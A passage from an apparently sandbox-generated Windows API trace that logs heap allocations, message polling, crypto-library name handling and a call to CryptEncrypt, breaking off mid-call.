returned 0x2e51070 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0233.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0233.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.910] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0233.910] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.910] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0233.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0233.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.911] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.911] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0233.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0233.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0233.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0233.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0233.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0233.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0233.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0233.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0233.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0233.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0233.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0233.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0233.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0234.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f35aa0 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f35aa0 | out: hHeap=0x970000) returned 1 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0234.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0234.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0234.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0234.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0234.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0234.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0234.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0234.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0234.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0234.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0234.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0234.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51538, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0234.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.006] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0234.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0234.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.006] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xb0ca, dwBufLen=0x0 | out: pbData=0x0*, 